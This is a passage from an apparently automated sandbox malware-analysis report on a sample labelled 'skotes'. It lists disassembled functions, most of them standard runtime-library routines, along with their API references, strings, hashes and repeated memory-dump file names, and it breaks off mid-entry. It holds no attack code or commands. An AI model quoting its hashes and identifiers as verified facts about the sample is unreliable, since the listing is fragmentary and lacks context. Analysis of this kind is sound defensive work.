Instruction Fuzzy Hash: 69210B72A04205AFCF1CDFA4DD46EEAB7B8FF46720F108569F91197280D731EA81B690

Function 00C1727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00C172BE

Strings

.cmd, xrefs: 00C172DC
.com, xrefs: 00C172FE
.bat, xrefs: 00C172ED
.exe, xrefs: 00C172CB

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: ec24489adb29c91f5a34bd2e6c5dd07cf24db92fdbac4c2f53d42428bfd970f8
Instruction ID: a15da907a3abb99e8de398d37b15df5b9e0f0a1e4f9154deb465956c1a3e41dc
Opcode Fuzzy Hash: ec24489adb29c91f5a34bd2e6c5dd07cf24db92fdbac4c2f53d42428bfd970f8
Instruction Fuzzy Hash: A601D67771CA26256A152059AD03BE613A88BC3BB4B26022AFC74F76D1EF54DDC271E0

Function 00BFFA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BFFB06

Strings

SetThreadGroupAffinity, xrefs: 00BFFA87
kernel32.dll, xrefs: 00BFFA7A
GetCurrentProcessorNumberEx, xrefs: 00BFFABE
GetThreadGroupAffinity, xrefs: 00BFFA93

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 348560076-465693683
Opcode ID: 97c96e4ef1dc50e1a6137e38a25c66bb6d7a2730db3093795a568ba5c45ee67b
Instruction ID: c854c2a16dea8dfb5866081a7596c9c1707f245d999e9518e51ff8eb02889cb6
Opcode Fuzzy Hash: 97c96e4ef1dc50e1a6137e38a25c66bb6d7a2730db3093795a568ba5c45ee67b
Instruction Fuzzy Hash: 7D01F56566130A2E9710B7795C8ABBB36ECEE02B04B250476F901E3183FDA4D808A665

Function 00C12097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 00C120B7

Part of subcall function 00C0CAF3: Mailbox.LIBCMT ref: 00C0CB2D

Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C120C8
StructuredWorkStealingQueue.LIBCMT ref: 00C120FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C1210F

Strings

e, xrefs: 00C120D9

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
String ID: e
API String ID: 1411586358-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 7175feb801981eb932589665e6b9b3aab2a331e41cb75a4a045d53dc4edc9db1
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: E011E739200104ABCB05DE69C8816EE73A4EF07324B34C159FD068F142DB71DD92FBA0

Function 00BFD029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

___scrt_fastfail.LIBCMT ref: 00BFD0A5

Strings

kernel32.dll, xrefs: 00BFD04C
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BFD03B
WakeAllConditionVariable, xrefs: 00BFD069
SleepConditionVariableCS, xrefs: 00BFD05D

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2964418898-3242537097
Opcode ID: 2dd09723fc2284aa7b0afa99ee69cdd14e10e68f1ce1b45c5b84c4f6c5c907c5
Instruction ID: 01b600eb13887b61148cf3a8832cd57e219f280ed981474c6bb42c92f15a9a8c
Opcode Fuzzy Hash: 2dd09723fc2284aa7b0afa99ee69cdd14e10e68f1ce1b45c5b84c4f6c5c907c5
Instruction Fuzzy Hash: 1701AD61BF2B196AAE313B715C1DF6F22CEEF83B50F091170BD00E3280DEA0C8058561

Function 00C24C14 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00C24C98
__alloca_probe_16.LIBCMT ref: 00C24D5E
__freea.LIBCMT ref: 00C24DCA
__freea.LIBCMT ref: 00C24DD3
__freea.LIBCMT ref: 00C24DF6

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16
String ID:
API String ID: 3509577899-0
Opcode ID: dd7b0f37d090432abda10f34238036d442b230c67e220614ad975a2025b4e722
Instruction ID: d18019e8be1b72741bdbbae89efe9039686aabb27a821676d7ded2342c1c4bcf
Opcode Fuzzy Hash: dd7b0f37d090432abda10f34238036d442b230c67e220614ad975a2025b4e722
Instruction Fuzzy Hash: 26511572600226AFEB299F64EC41FFB3BA9DF85750F150229FD14E7540EB70DD50AAA0

Function 00C0E8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 00C0E91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00C0E926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00C0E950
